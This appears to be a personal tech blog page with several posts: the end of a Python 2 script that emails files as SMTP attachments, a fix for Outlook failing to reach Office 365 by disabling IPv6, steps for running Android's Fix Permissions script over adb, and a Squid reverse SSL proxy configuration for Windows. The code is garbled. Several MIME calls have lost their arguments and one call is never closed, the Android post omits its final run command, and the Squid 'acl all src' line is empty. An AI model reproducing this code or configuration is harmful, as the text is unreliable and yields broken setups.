                    print clientNum + " " + email

        print clientCSVList
        print "Missing: " + str(missing)
    except Exception as e:
        print "Exception: " + str(e.args)

    #mail each matched file to its recipient
    for client in clientCSVList:
        try:
            send_email("[email protected]", client[1], "Email Subject Here", "Email body text here", client[2])
            print client[0] + " Success"
        except Exception as e:
            print "Exception: " + str(e.args)
            print client[0] + " Failure"

def send_email(sender, receiver, subject, message, fileattachment=None):
    emailfrom = sender
    emailto = receiver
    fileToSend = fileattachment
    username = "smtp_username"
    password = "smtp_password"

    msg = MIMEMultipart()
    msg["From"] = emailfrom
    msg["To"] = emailto
    msg["Subject"] = subject
    #attach the message text so MIME-aware clients display it as the body
    msg.attach(MIMEText(message))

    ctype, encoding = mimetypes.guess_type(fileToSend)
    if ctype is None or encoding is not None:
        ctype = "application/octet-stream"

    maintype, subtype = ctype.split("/", 1)

    if maintype == "text":
        fp = open(fileToSend)
        # Note: we should handle calculating the charset
        attachment = MIMEText(, _subtype=subtype)
    elif maintype == "image":
        fp = open(fileToSend, "rb")
        attachment = MIMEImage(, _subtype=subtype)
    elif maintype == "audio":
        fp = open(fileToSend, "rb")
        attachment = MIMEAudio(, _subtype=subtype)
    else:
        fp = open(fileToSend, "rb")
        attachment = MIMEBase(maintype, subtype)
        attachment.set_payload(
        encoders.encode_base64(attachment)
    fp.close()
    attachment.add_header("Content-Disposition", "attachment", filename=fileToSend)
    msg.attach(attachment)

    server = smtplib.SMTP("server", 25) #insert your SMTP server and port
    server.login(username, password)
    server.sendmail(emailfrom, emailto, msg.as_string())
    server.quit()

def main():
    readCSV()

if __name__ == "__main__":
    main()
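
The attachment handling above leans on mimetypes.guess_type(), which returns a (type, encoding) pair; when the type is unknown or the file carries a compression encoding, the script falls back to application/octet-stream. A quick illustration (in modern Python; the filenames are just examples):

```python
import mimetypes

for name in ["report.pdf", "notes.txt", "archive.tar.gz", "mystery.xyz123"]:
    ctype, encoding = mimetypes.guess_type(name)
    # An unknown type, or an encoding like gzip, means we can't trust the guess
    if ctype is None or encoding is not None:
        ctype = "application/octet-stream"
    print(name, ctype)
```

The .tar.gz case is why the script checks encoding: guess_type reports the inner type (tar) plus a gzip encoding, so sending it as a plain tar would be wrong.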

Office 365 Outlook Configuration Problem

drew | 26 Apr 2013 | Office 365

TL;DR – Disable IPv6 for the network adapter

In my spare time I moonlight as the CIO of a startup owned by some friends, and last year I decided that the best solution for a new business that didn’t want to invest any capital in computer hardware was cloud computing.  Their needs were fairly basic: email access.  No need for a dedicated Exchange box sitting in the non-existent server room.  However, access via Outlook and mobile devices was mandatory, as was calendar and contact sharing, so we opted to go with a hosted Exchange solution rather than a service offering only POP or IMAP.  I chose Office 365 P1.  At $6/month per person, it was a no-brainer.

I set this up for my friends on their smartphones and laptops (and my own phone as well) and have been very happy with it since then.  However, Microsoft ran some upgrades 2 weeks ago (one of the major changes being a move to Exchange 2013).  During this upgrade (and afterwards), the company’s President was having issues with Outlook not connecting.  It worked fine on his phone, and we were usually able to get in through Outlook Web App, but Outlook was always hit or miss.  During one of these periods, I was unable to get into OWA myself, so I chalked it up to upgrade issues and told my friend to let me know if the problem persisted.  It did, so I went to work.

After testing out a few things within Outlook, I eventually removed the email account from the profile and attempted to re-add it.  This was a bad idea, as now Outlook would hang when trying to open the profile (which contained other important data).  Eventually I just removed the problematic account and we were able to get into the profile, but he still needed the account back.  This shouldn’t have been a difficult thing to do.  By default, Office 365 configures DNS settings for your domain, including Autodiscover, and my friend is using Outlook 2010 which should have worked flawlessly with this, but this was not the case.

The problem we were having was getting Outlook to configure the Exchange settings.  We would type the email address and password, and sometimes Outlook would autoconfigure itself using the Autodiscover settings; other times it would throw an error about being “unable to establish an encrypted connection”.  After a few tries we manually input the server settings, but we were still unable to make the account work.  The strangest part is that after seemingly setting itself up properly using Autodiscover (which validated to me that we had the right settings), Outlook would hang when trying to authenticate, i.e. it would either not pop up a username/password prompt, or sometimes it would but then reject the credentials we gave it, which I had already validated were correct.

Anyways, after working with Microsoft Office 365 phone support for over an hour (which is included with the low-cost monthly subscription, by the way), I eventually gave up for the day and decided to try again in the morning.

The next morning I remoted back into my friend’s machine and tried again.  Same issues as before: sporadic problems that appeared sometimes but not others, and we were never able to fully complete the process.  At some point I decided to ping Google just to see what the response was (not sure what was going through my mind, but I’m thankful for whatever it was).  I noticed that I was receiving an IPv6 response back from Google.  WTF is this, I thought.  Then I checked the network settings and came across my issue.  My friend was using a Verizon Wireless 4G aircard to connect to the Internet.  This card was so kind as to assign him both an IPv4 and an IPv6 address, standard operating procedure within Windows 7.  However, these were both public addresses, not a link-local (i.e. non-routable) IPv6 address.  I decided that Outlook was having some issue connecting to Office 365 because of this.  My best guess is that Outlook was trying to connect using IPv6, then failing over to IPv4 (but not consistently), which explained why *sometimes* it would connect to Autodiscover but not other times, and why after it did successfully Autodiscover, we couldn’t make it past there.
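
One way to spot this kind of problem without pinging around is to ask the resolver which address families a host resolves to. A small diagnostic sketch (modern Python; the hostname here is just an example):

```python
import socket

def address_families(host):
    """Return the set of IP versions a hostname resolves to."""
    families = set()
    for family, _, _, _, _ in socket.getaddrinfo(host, None):
        if family == socket.AF_INET:
            families.add("IPv4")
        elif family == socket.AF_INET6:
            families.add("IPv6")
    return families

# If this reports both IPv4 and IPv6 but IPv6 traffic doesn't actually
# route, clients may stall or fail intermittently, as Outlook did here.
print(address_families("localhost"))
```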

My solution was simple: go into the network properties for the adapter and uncheck the IPv6 box.  No reboot required.  A problem that took several hours was solved in about 10 seconds.

Manually Run “Fix Permissions” From Recovery

I own a Samsung Galaxy Nexus running Android 4.0.4 (Ice Cream Sandwich).  My phone is rooted and running a custom recovery (Clockworkmod Touch).  I’m not sure if it’s been the case since I purchased the phone (when I originally had the most recent non-touch version of Clockworkmod), or if it started after upgrading to the touch version of CWM, or if it’s a result of me installing a custom ROM and just generally f—ing with my phone, but “Fix Permissions” doesn’t work from recovery any more.  This wouldn’t be a big deal if I could run it from Rom Manager; however, my phone seems to stall every time I run it while Android is booted.  It appears to hang while processing running applications: every time it stalled, I exited out of Fix Permissions (in Rom Manager), force closed the app it stalled on, then re-ran Fix Perms, and I’d make a little more progress, only to stall again on another app.  Finally I FC’d enough apps that Fix Perms completed, but I had mixed feelings about the quality of the job I’d just performed.

When you run Fix Perms, the first line (helpfully) prints the script that is being run, which is “/data/data/com.koushikdutta.rommanager/files/fix_permissions”.  Using this info, I attempted to boot into recovery and run the script manually from the ADB shell of my PC.  Again, Fix Perms seemed to stall, only this time I knew it couldn’t be a running app that caused the issue (remember, I’m booted into recovery!).  I issued an

“adb pull /data/data/com.koushikdutta.rommanager/files/fix_permissions”

to get a copy of the Fix Perms script on my computer and checked it out.  It turns out that at the top of the script there is a big warning that states “Warning: if you want to run this script in cm-recovery change the above to #! /sbin/sh”.  Fair enough.  I changed the first line of the script to “#! /sbin/sh” and then pushed the script back to my phone using the following command:

“adb push fix_permissions /data/media”

I pushed the file to the “/data/media” directory instead of the original directory the file came from as that would have overwritten the original and not allowed it to run while Android is booted (not that it’s working anyway…).  NOTE: The “/data/media” directory on the Galaxy Nexus is the virtual SD card (the GN doesn’t have removable media, so it tricks Android into thinking this directory is an SD card).  If you’re using a different phone you’ll likely have to load the script into a different directory.  It shouldn’t make a difference where you place the file, I just wouldn’t put it in the “/data/data” directory.

Once you’ve loaded the script onto your phone, set the proper executable permissions by issuing the command below. Remember to change the file path to wherever you placed the file.

“chmod +x /data/media/fix_permissions”

After that’s done, run the script by issuing:


The script should run and fix your file system permissions without stalling.

Squid Reverse SSL Proxy With Multiple Sites (on Windows)

I’ve been running my Exchange 2010 OWA site on a non-standard port (default is 443) for a while so that I can run SSL for my personal website (you’re reading it) on the standard port.  My server is hosted at home, and I only have 1 public IP, so unless I (re-)installed everything on a single server, I could only have 1 site running on port 443.

This has been fine, up until yesterday, when I attempted to install Exchange 2010 SP2.  The installation kept failing due to some issue with IIS.  I assumed it was due to the fact that I had moved the OWA site from “Default Site Name” to its own site on the same server.  To remedy this, I removed the OWA, ECP and ActiveSync virtual directories and re-installed them in the default location on my Exchange box.  After doing this, SP2 installed fine.  However, now I am back at my original problem (2 servers needing incoming traffic on port 443).  I could re-do the custom OWA setup, but what a PITA that’d be to do every time an Exchange update comes out (theoretically).

My solution: Squid!  I fought Squid until the wee hours of the morning before calling it quits and going to bed.  This morning I tried my configuration again, and this time I have success.  The goal, of course, was to have Squid running on a local server and receiving all traffic on port 443, and based on the URL of the incoming request, redirect traffic to the proper server.

The first thing you need to do is download Squid.  The Windows binary can be obtained from here:  After you download it (it’s a zip file), extract it to c:/squid.  By default, Squid expects to be there, so if you place it somewhere else you’ll have a little more work to do.  This was my first experience with Squid, and as such I opted to use the stable release for Windows, which is 2.7, Stable8.  Also, since I’m setting up a reverse proxy using SSL, I downloaded the SSL support version.

My configuration for squid.conf is below (edited to remove any personal information).  This file needs to be located in the squid/etc directory.  By default, there are example files in there for all config files.  You’ll also need to rename cachemgr.conf.default and mime.conf.default to cachemgr.conf and mime.conf, respectively.  I didn’t edit any settings within those files as I was under the impression that the defaults were fine.  There’s a 4th file in there that doesn’t even need to be configured or renamed for this setup.

The first section here is setting the cache directory (if you opt not to use the default).  Please note: the default location is c:/squid/var/cache, however, if you simply extracted the Squid Windows binary zip to c:/squid, the /var/cache directory does not exist and will cause an error.  Please create that directory (or whatever directory you specify below). Also, ensure that when typing directory paths you use the "/" slash instead of the normal Windows "\" slash.

#Set Cache Directory
cache_dir ufs c:/path/to/cache_dir 100 16 256

This next section is specifying that we want HTTPS to run on port 443 and accelerate (cache) reverse requests. Then it points to the SSL certificate and the corresponding private key. I installed a non-password protected key, as I found that Squid would hang when starting if the key was protected (makes sense). The last part, "vhost", tells Squid that there are multiple sites. I found that without "vhost", my config didn’t work as expected. Also, most documentation I found suggested adding "defaultsite=(url of default site)" to this line. This caused me major headaches, as Squid kept redirecting to the wrong site and I’d get 404 errors when the requested files didn’t exist on the server I was directed to.

#Define Port(s) and Cert(s) (if appropriate)#
https_port 443 accel cert=c:/path/to/cert/cert.crt key=c:/path/to/key/priv.key vhost

Here, we define the sites we are proxying to. "cache_peer" is followed by the internal IP address of the target host. 443 is the port number we’re directing to. "ssl" tells Squid to use SSL. "login=PASS" allows for pass-through authentication (such as when using .htaccess). "name" specifies the name we’ll use to refer to this host within Squid.

#Define Sites#
cache_peer <wordpress_internal_IP> parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=wordpress
cache_peer <exchange_internal_IP> parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=exchange

Here we’re configuring some ACLs for our proxy. I chose to add "-acl" to the name of my ACLs just for clarity. The last 2 parts of the first line (and 1 part of the second line) specify the destination URL(s) that the ACL will work for. The last line, "acl all", defines an ACL for all IP addresses. This will be used to deny all traffic access that doesn’t meet our other conditions.

acl wordpress-acl dstdomain <wordpress_site_URL>
acl exchange-acl dstdomain <exchange_site_URL>
acl all src

Here we’re enabling the ACLs (as before we just defined them). "http_access allow" allows traffic using the specified ACL. My "cache_peer_access" statements seem to be saying the same thing as the "http_access" statements, however, this is what I ended up with after tons of trial and error, so I’m leaving it as-is. Those statements may be redundant and only 1 might be necessary. The last line, "never_direct", was only needed for Exchange OWA. If you’re not hosting OWA, you can probably leave that off.

#Enable ACLs#
http_access allow wordpress-acl
cache_peer_access wordpress allow wordpress-acl
http_access allow exchange-acl
cache_peer_access exchange allow exchange-acl
never_direct allow exchange-acl

Here we’re denying all other requests to access our servers behind the proxy

#Deny all others#
cache_peer_access wordpress deny all
cache_peer_access exchange deny all


And that’s it!  Install Squid as a service (if you haven’t done so already) by using the “squid.exe -i” command.  The squid.exe file is in the squid/sbin/ directory.  If you unzipped Squid to any directory other than c:/squid, you’ll need to add another switch (I think it’s “-f”) to the install command to specify the location of everything.  Documentation for the Windows binary can be found here:

Please make sure that there are no port conflicts on the host running Squid.  I found that when another program was running on port 443 Squid would hang when started from the Services console.  Also, make sure that you have the necessary firewall ports open.  Then start Squid from the Services console.

Now verify that everything’s working properly.  Squid will create a log file in the same directory as the squid.exe file if there are any errors upon initialization.  After that, logs will be created in the squid/var/logs directory.